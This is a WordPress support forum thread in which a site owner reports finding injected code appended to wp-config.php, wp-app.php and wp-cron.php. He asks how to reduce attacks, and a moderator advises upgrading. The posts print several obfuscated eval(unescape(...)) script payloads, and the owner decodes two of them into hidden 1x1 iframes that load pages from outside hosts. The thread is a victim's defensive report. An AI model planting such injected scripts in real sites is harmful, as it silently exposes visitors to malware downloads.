Title: Potential hack attempt
Last modified: August 18, 2016

---

# Potential hack attempt

 *  [wildeep](https://wordpress.org/support/users/wildeep/)
 * (@wildeep)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/potential-hack-attempt/)
 * After noting a ‘headers already sent’ error, I found these three lines at the
   bottom of a wordpress ‘wp-config.php’ file today:
 *     ```
       <body>
       <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
       <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>
       ```
   
 * which after a bit of processing, turn out to be these lines of javascript:
 * document.write(‘<iframe src=http://softspydelete.com/dl/newnew.php?adv=89 width
   =1 height=1></iframe>’);
 * and
 * document.write(‘<iframe src=http://softspydelete.com/dl/089/new.php width=1 height
   =1></iframe>’);
 * respectively.
 * I’ve pulled these lines (which removed the ‘headers already sent’ error)

Viewing 3 replies - 1 through 3 (of 3 total)

 *  Thread Starter [wildeep](https://wordpress.org/support/users/wildeep/)
 * (@wildeep)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/potential-hack-attempt/#post-663109)
 * Other than updating to the most recent version of WP, what else should I be doing
   to reduce the number/severity of attacks?
 *  Thread Starter [wildeep](https://wordpress.org/support/users/wildeep/)
 * (@wildeep)
 * [18 years, 5 months ago](https://wordpress.org/support/topic/potential-hack-attempt/#post-663417)
 * found some more:
 * at the bottom of wp-app.php
 * nobody:nobody set to 644
 * <body>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%
   27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%
   79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%
   20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%
   3e%27%29%3b’));</script> <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%
   72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%73%
   6f%66%74%73%70%79%64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77%6e%65%77%
   2e%70%68%70%3f%61%64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%
   3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b’));</script>
 * at the bottom of wp-cron.php
 * nobody:nobody set to 644
 * <body>
    <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%
   27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%67%68%74%73%
   74%61%74%73%2e%6e%65%74%2f%64%6c%2f%30%38%39%2f%6e%65%77%2e%70%68%70%20%77%69%
   64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%
   3b’));</script> <script>eval(unescape(‘%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%
   65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%68%69%67%68%
   74%73%74%61%74%73%2e%6e%65%74%2f%64%6c%2f%6e%65%77%6e%65%77%2e%70%68%70%3f%61%
   64%76%3d%38%39%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%
   66%72%61%6d%65%3e%27%29%3b’));</script>
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years, 5 months ago](https://wordpress.org/support/topic/potential-hack-attempt/#post-663418)
 * What version of WordPress are you using? Older versions may be vulnerable to 
   hacking. Upgrade to the latest version.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Potential hack attempt’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 2 participants
 * Last reply from: [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * Last activity: [18 years, 5 months ago](https://wordpress.org/support/topic/potential-hack-attempt/#post-663418)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics